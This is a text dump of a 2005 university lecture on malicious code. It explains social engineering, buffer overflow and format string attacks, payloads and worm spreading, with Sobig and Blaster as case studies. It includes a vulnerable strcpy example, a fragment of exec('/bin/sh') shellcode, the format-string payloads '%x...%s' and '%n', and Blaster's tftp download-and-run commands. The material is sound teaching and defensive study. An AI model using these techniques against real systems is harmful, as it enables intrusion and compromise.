Malicious Code Malicious Code for Fun and Profit for Fun and - - PowerPoint PPT Presentation

Malicious Code Malicious Code

for Fun and Profit for Fun and Profit

Mihai Christodorescu

mihai@cs.wisc.edu 10 March 2005

10 March 2005 Mihai Christodorescu 2

What is Malicious Code? What is Malicious Code?

Viruses, worms, trojans, … Code that breaks your security policy. Characteristics Attack vector Payload Spreading algorithm

10 March 2005 Mihai Christodorescu 3

Outline Outline

• Attack Vectors
• Payloads
• Spreading Algorithms
• Case Studies

10 March 2005 Mihai Christodorescu 4

Attack Vectors Attack Vectors

• Social engineering

“Make them want to run it.”

• Vulnerability exploitation

“Force your way into the system.”

• Piggybacking

“Make it run when other programs run.”

10 March 2005 Mihai Christodorescu 5

Social Engineering Social Engineering

• Suggest to user that the executable is:

– A game. – A desirable picture/movie. – An important document. – A security update from Microsoft. – A security update from the IT department.

• Spoofing the sender helps.

10 March 2005 Mihai Christodorescu 6

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies

10 March 2005 Mihai Christodorescu 7

Vulnerability Exploitation Vulnerability Exploitation

• Make use of flaws in software input

handling.

• Sample techniques:

– Buffer overflow attacks. – Format string attacks. – Return-to-libc attacks. – SQL injection attacks.

10 March 2005 Mihai Christodorescu 8

Basic Principles Basic Principles

A buffer overflow occurs when data is stored past the boundaries of an array or a string. The additional data now overwrites nearby program variables. Result: Attacker controls or takes over a currently running process.

Buffer Overflows

10 March 2005 Mihai Christodorescu 9

Example Example

Expected input: \\hostname\path

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

10 March 2005 Mihai Christodorescu 10

Example Example

Expected input: \\hostname\path

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; } process_request( “\\tux12\usr\foo.txt” ); ⇒ OK

10 March 2005 Mihai Christodorescu 11

Example Example

Expected input: \\hostname\path

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; } process_request( “\\tux12\usr\foo.txt” ); ⇒ OK process_request( “\\aaabbbcccdddeeefffggghhh\bar” ); ⇒ BAD

10 March 2005 Mihai Christodorescu 12

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

10 March 2005 Mihai Christodorescu 13

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request() strcpy()

10 March 2005 Mihai Christodorescu 14

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request() strcpy()

10 March 2005 Mihai Christodorescu 15

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request() strcpy()

arg: req eq

10 March 2005 Mihai Christodorescu 16

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request() strcpy()

return address frame pointer arg: req eq

10 March 2005 Mihai Christodorescu 17

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request() strcpy()

return address frame pointer arg: req eq local: host host

10 March 2005 Mihai Christodorescu 18

A stack frame per procedure call.

Program Stack Program Stack

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request() strcpy()

return address local: pos pos frame pointer arg: req eq local: host host

10 March 2005 Mihai Christodorescu 19

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address frame pointer arg: req eq local: host host local: pos pos process_request( “\\tux12\usr\foo.txt” );

10 March 2005 Mihai Christodorescu 20

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos

10 March 2005 Mihai Christodorescu 21

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos t

10 March 2005 Mihai Christodorescu 22

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos t u

10 March 2005 Mihai Christodorescu 23

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos t u x

10 March 2005 Mihai Christodorescu 24

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos t u x 1

10 March 2005 Mihai Christodorescu 25

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos t u x 1 2

10 March 2005 Mihai Christodorescu 26

Normal Execution Normal Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 7 frame pointer arg: req eq local: host host process_request( “\\tux12\usr\foo.txt” ); local: pos pos t u x 1 2 \0

10 March 2005 Mihai Christodorescu 27

Overflow Execution Overflow Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 32 frame pointer arg: req eq local: host host process_request( “\\aaabbbcccdddeeefffggghhhiiijjj\bar” ); local: pos pos

10 March 2005 Mihai Christodorescu 28

Overflow Execution Overflow Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 32 frame pointer arg: req eq local: host host process_request( “\\aaabbbcccdddeeefffggghhhiiijjj\bar” ); local: pos pos a a a b b b c c c d d d e e e f f f g g

10 March 2005 Mihai Christodorescu 29

Overflow Execution Overflow Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 32 frame pointer arg: req eq local: host host process_request( “\\aaabbbcccdddeeefffggghhhiiijjj\bar” ); local: pos pos a a a b b b c c c d d d e e e f f f g g g h h h

10 March 2005 Mihai Christodorescu 30

Overflow Execution Overflow Execution

Buffer Overflows

void process_request( char * req ) { // Get hostname char host[ 20 ]; int pos = find_char( req, ‘\\’, 2 ); strcpy( host, substr( req, 2, pos – 1 ) ); ... return; }

main() process_request()

return address 32 frame pointer arg: req eq local: host host process_request( “\\aaabbbcccdddeeefffggghhhiiijjj\bar” ); local: pos pos a a a b b b c c c d d d e e e f f f g g g i i i j h h h j j \0 Characters that

• verwrite the

return address.

10 March 2005 Mihai Christodorescu 31

The attacker gets one chance to gain control. Craft an input string such that:

• The return address is overwritten with a pointer

to malicious code.

• The malicious code is placed inside the input

string.

Smashing the Stack Smashing the Stack

Buffer Overflows Malicious code can create a root shell by executing “/bin/sh”.

10 March 2005 Mihai Christodorescu 32

Shell Code Shell Code

C0 31 08 76 89 5E 17 EB 0B B0 0C 46 89 07 46 88 CD D2 31 08 4E 8D F3 89 b / FF FF FF E4 E8 80 i n / s h \0 arg 2 to code pointer arg 1 arg 2

Buffer Overflows

Code for exec(“/bin/sh”): mov edx, arg2 mov ecx, arg1 mov ebx, “/bin/sh” mov eax, 0Bh int 80h Pointer value for

• verwriting the return

address.

10 March 2005 Mihai Christodorescu 33

• Defense against stack-smashing attacks:

– Bounds-checking. – Protection libraries. – Non-executable stack. – setuid()/chroot(). – Avoid running programs as root! – Address randomization. – Behavioral monitoring.

Thicker Armor Thicker Armor

Buffer Overflows

10 March 2005 Mihai Christodorescu 34

More Info More Info

“Smashing the Stack for Fun and Profit” by Aleph One StackGuard, RAD, PAX, ASLR CERT

10 March 2005 Mihai Christodorescu 35

Format String Attacks Format String Attacks

• Another way to illegally control program

values.

• Uses flaws in the design of printf():

printf( “%s: %d” , s, x ); Format Strings

10 March 2005 Mihai Christodorescu 36

Format String Attacks Format String Attacks

• Another way to illegally control program

values.

• Uses flaws in the design of printf():

printf( “%s: %d” , s, x ); Format Strings

10 March 2005 Mihai Christodorescu 37

printf printf() () Operation

Operation

printf( “%s: %d, %x”, s, x, y ); Format Strings

foo() printf()

y x s format string ptr

10 March 2005 Mihai Christodorescu 38

printf printf() () Operation

Operation

printf( “%s: %d, %x”, s, x, y ); Format Strings

foo() printf()

y x s format string ptr

10 March 2005 Mihai Christodorescu 39

printf printf() () Operation

Operation

printf( “%s: %d, %x”, s, x, y ); Format Strings

foo() printf()

y x s format string ptr

10 March 2005 Mihai Christodorescu 40

printf printf() () Operation

Operation

printf( “%s: %d, %x”, s, x, y ); Format Strings

foo() printf()

y x s format string ptr

10 March 2005 Mihai Christodorescu 41

Attack 1: Read Any Value Attack 1: Read Any Value

What the code says: printf( str ); What the programmer meant: printf( “%s”, str );

If str = “%x%x%x%x%s”

Format Strings

secret key ptr format string ptr

10 March 2005 Mihai Christodorescu 42

Attack 1: Read Any Value Attack 1: Read Any Value

What the code says: printf( str ); What the programmer meant: printf( “%s”, str );

If str = “%x%x%x%x%s”

Format Strings

secret key ptr format string ptr

10 March 2005 Mihai Christodorescu 43

Attack 2: Write to Address Attack 2: Write to Address

What the code says: printf( str );

If str = “%x%x%x%x%n”

Format Strings

return address format string ptr

10 March 2005 Mihai Christodorescu 44

Attack 2: Write to Address Attack 2: Write to Address

What the code says: printf( str );

If str = “%x%x%x%x%n”

Format Strings

return address format string ptr 4

10 March 2005 Mihai Christodorescu 45

Defenses Defenses

Never use printf() without a format string! FormatGuard.

Format Strings

10 March 2005 Mihai Christodorescu 46

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies

10 March 2005 Mihai Christodorescu 47

Piggybacking Piggybacking

Malicious code injected into a benign program or data file.

• Host file can be:

– An executable. – A document with some executable content (Word documents with macros, etc.).

10 March 2005 Mihai Christodorescu 48

Piggybacking Executables Piggybacking Executables

• Modify program on disk:

10 March 2005 Mihai Christodorescu 49

Piggybacking Executables Piggybacking Executables

• Modify program on disk:

10 March 2005 Mihai Christodorescu 50

Piggybacking Executables Piggybacking Executables

• Modify program on disk:

j mp evil_code

10 March 2005 Mihai Christodorescu 51

Piggybacking Executables Piggybacking Executables

• Modify program on disk:

j mp evil_code

Variations:

• Jump to malicious code
• nly on certain actions.
• Spread malicious code

throughout program.

10 March 2005 Mihai Christodorescu 52

Piggybacking Documents Piggybacking Documents

• Documents with macros:

Microsoft Office supports documents with macros scripted in Visual Basic (VBA).

• Macro triggered on:

– Document open – Document close – Document save – Send document by email

10 March 2005 Mihai Christodorescu 53

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies
• Defenses

10 March 2005 Mihai Christodorescu 54

• Payload

Payload

Target the interesting data:

• Passwords
• Financial data
• User behavior
• User attention

Keylogger Screen scraper Spyware Adware

10 March 2005 Mihai Christodorescu 55

More Payload Ideas More Payload Ideas

Victim machines are pawns in larger attack:

– Botnets. – Distributed denial of service (DDoS). – Spam proxies. – Anonymous FTP sites. – IRC servers.

10 March 2005 Mihai Christodorescu 56

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies
• Defenses

10 March 2005 Mihai Christodorescu 57

• Spreading Methods

Spreading Methods

Depends on the attack vector:

Email-based ⇒ need email addresses Vulnerability-based ⇒ need IP addresses of hosts running the vulnerable service Piggybacking ⇒ need more files to infect

10 March 2005 Mihai Christodorescu 58

Spreading through Email Spreading through Email

Malware I nt ernet

HTML files (from cache) Windows Address Book Outlook Express folders Outlook folders

10 March 2005 Mihai Christodorescu 59

Vulnerable Target Discovery Vulnerable Target Discovery

Need to find Internet (IP) addresses.

• Scanning:
• Target list:
• Passive: Contagion worms

Random Sequential Bandwidth-limited Pre-generated Externally-generated ⇒ Metaserver worms Internal target list ⇒ Topological worms

10 March 2005 Mihai Christodorescu 60

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies

10 March 2005 Mihai Christodorescu 61

Types of Malicious Code Types of Malicious Code

• Virus

Self-replicating, infects programs and documents.

e.g.: Chernobyl/CIH, Melissa, Elkern

• Worm

Self-replicating, spreads across a network.

e.g.: ILoveYou, Code Red, B(e)agle, Witty

McGraw and Morrisett “Attacking malicious code: A report to the Infosec Research Council” Sept./Oct. 2000.

10 March 2005 Mihai Christodorescu 62

Types of Malicious Code Types of Malicious Code

• Trojan

– Malware hidden inside useful programs

e.g.: NoUpdate, KillAV, Bookmarker

• Backdoor

– Tool allowing unauthorized remote access

e.g.: BackOrifice, SdBot, Subseven

10 March 2005 Mihai Christodorescu 63

Types of Malicious Code Types of Malicious Code

• Spyware

– Secretly monitors system activity

e.g.: ISpynow, KeyLoggerPro, Look2me

• Adware

– Monitors user activity for advertising purposes

e.g.: WildTangent, Gator, BargainBuddy

10 March 2005 Mihai Christodorescu 64

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies: Sobig

10 March 2005 Mihai Christodorescu 65

The The Sobig Sobig Worm Worm

• Mass-mailing, network-aware worm
• Multi-stage update capabilities

10 Sept 2003 18 Aug 2003 Sobig.F 14 July 2003 25 June 2003 Sobig.E 2 July 2003 18 June 2003 Sobig.D 8 June 2003 31 May 2003 Sobig.C 31 May 2003 18 May 2003 Sobig.B

• 9 Jan. 2003

Sobig.A

Deactivation Launch

10 March 2005 Mihai Christodorescu 66

• E-mail
• Network shares

Sobig Sobig: Attack Vector : Attack Vector

big@boss.com From: Subject:

• Compressed executable

attachment with renamed extension.

• Later: attachment in ZIP file.

10 March 2005 Mihai Christodorescu 67

Sobig Sobig: Payload : Payload

10 March 2005 Mihai Christodorescu 68

Sobig Sobig: Payload : Payload

10 March 2005 Mihai Christodorescu 69

Sobig Sobig: Payload : Payload

Geocit ies web page

10 March 2005 Mihai Christodorescu 70

Sobig Sobig: Payload : Payload

Troj an web server

10 March 2005 Mihai Christodorescu 71

Sobig Sobig: Payload : Payload

Troj an web server

• 1

st st age:

Backdoor (Lala) & keylogger

• 2nd st age:

Proxy (WinGat e)

10 March 2005 Mihai Christodorescu 72

Sobig Sobig: Payload : Payload

. . .

Hacked DSL/ cable host s

1 22

10 March 2005 Mihai Christodorescu 73

Sobig Sobig: Payload : Payload

Troj an web server

10 March 2005 Mihai Christodorescu 74

Sobig Sobig: Spreading Algorithm : Spreading Algorithm

• E-mail addresses extracted from files on

disk.

• Network shares automatically discovered.

10 March 2005 Mihai Christodorescu 75

Sobig.F Sobig.F in Numbers in Numbers

August : 19 20 21 22 23

Cour t esy of MessageLabs.com

10 March 2005 Mihai Christodorescu 76

Outline Outline

• Attack Vectors:

Social Engineering Vulnerability Exploitation Piggybacking

• Payloads
• Spreading Algorithms
• Case Studies: Sobig, Blaster

10 March 2005 Mihai Christodorescu 77

The The Blaster Blaster Worm Worm

• Multi-stage worm exploiting Windows

vulnerability

17 August 2003: July 19 17 15 13 11 31 25 16

Blaster appears

10 March 2005 Mihai Christodorescu 78

The The Blaster Blaster Worm Worm

• Multi-stage worm exploiting Windows

vulnerability

17 August 2003: July 19 17 15 13 11 31 25 16

Microsoft releases patch LSD Research exploit released CERT advisory Blaster appears Metasploit refined exploit

10 March 2005 Mihai Christodorescu 79

The The Blaster Blaster Worm Worm

• Multi-stage worm exploiting Windows

vulnerability

17 August 2003: July 19 17 15 13 11 31 25 16

Microsoft releases patch LSD Research exploit released CERT advisory Blaster appears 1.2 million hosts infected Metasploit refined exploit FRB Atlanta, MD DMV, BMW Scandinavian bank closes all 70 branches

10 March 2005 Mihai Christodorescu 80

Blaster: Attack Vector Blaster: Attack Vector

• Uses a Microsoft Windows RPC DCOM

vulnerability.

• Coding flaw:
• 1. The RPC service passes part of the request to

function GetMachineName().

• 2. GetMachineName() copies machine name to

a fixed 32-byte buffer.

10 March 2005 Mihai Christodorescu 81

Blaster: Attack Vector Blaster: Attack Vector

Exploit 1

10 March 2005 Mihai Christodorescu 82

Blaster: Attack Vector Blaster: Attack Vector

Exploit 1

10 March 2005 Mihai Christodorescu 83

Blaster: Attack Vector Blaster: Attack Vector

“tftp GET msblast.exe” 2

TFTP Server

10 March 2005 Mihai Christodorescu 84

Blaster: Attack Vector Blaster: Attack Vector

TFTP Server

“GET msblast.exe” 3

10 March 2005 Mihai Christodorescu 85

Blaster: Attack Vector Blaster: Attack Vector

TFTP Server

4

10 March 2005 Mihai Christodorescu 86

Blaster: Attack Vector Blaster: Attack Vector

“start msblast.exe” 5

10 March 2005 Mihai Christodorescu 87

Blaster: Attack Vector Blaster: Attack Vector

10 March 2005 Mihai Christodorescu 88

Blaster: Payload Blaster: Payload

• Worm installs itself to start automatically.
• All infected hosts perform DDoS against

windowsupdate.com .

– SYN flood attack with spoofed source IP, Aug 15 → Dec 31 and after the 15th of all other months.

10 March 2005 Mihai Christodorescu 89

Blaster: Effect on Local Host Blaster: Effect on Local Host

• RPC/DCOM disabled:

– Inability to cut/paste. – Inability to move icons. – Add/Remove Programs list empty. – DLL errors in most Microsoft Office programs. – Generally slow, or unresponsive system performance.

10 March 2005 Mihai Christodorescu 90

Blaster: Spreading Algorithm Blaster: Spreading Algorithm

• Build IP address list:

40% chance to start with local IP address. 60% chance to generate random IP address.

• Probe 20 IPs at a time.
• Exploit type:

80% Windows XP. 20% Windows 2000.

10 March 2005 Mihai Christodorescu 91

Blaster: Infection Rate Blaster: Infection Rate

10 March 2005 Mihai Christodorescu 92

Future Threat: Future Threat: Superworm Superworm

“Curious Yellow: the First Coordinated Worm Design” – Brandon Wiley

• Fast replication & adaptability:

– Pre-scan the network for targets. – Worm instances communicate to coordinate infection process. – Attack vectors can be updated. – Worm code mutates.

10 March 2005 Mihai Christodorescu 93

Conclusions Conclusions

• Vulnerabilities left unpatched can and will

be used against you.

• Attackers are more sophisticated.
• Need to understand the attackers’

perspective.

Malicious Code Malicious Code

for Fun and Profit for Fun and Profit

Mihai Christodorescu

mihai@cs.wisc.edu 10 March 2005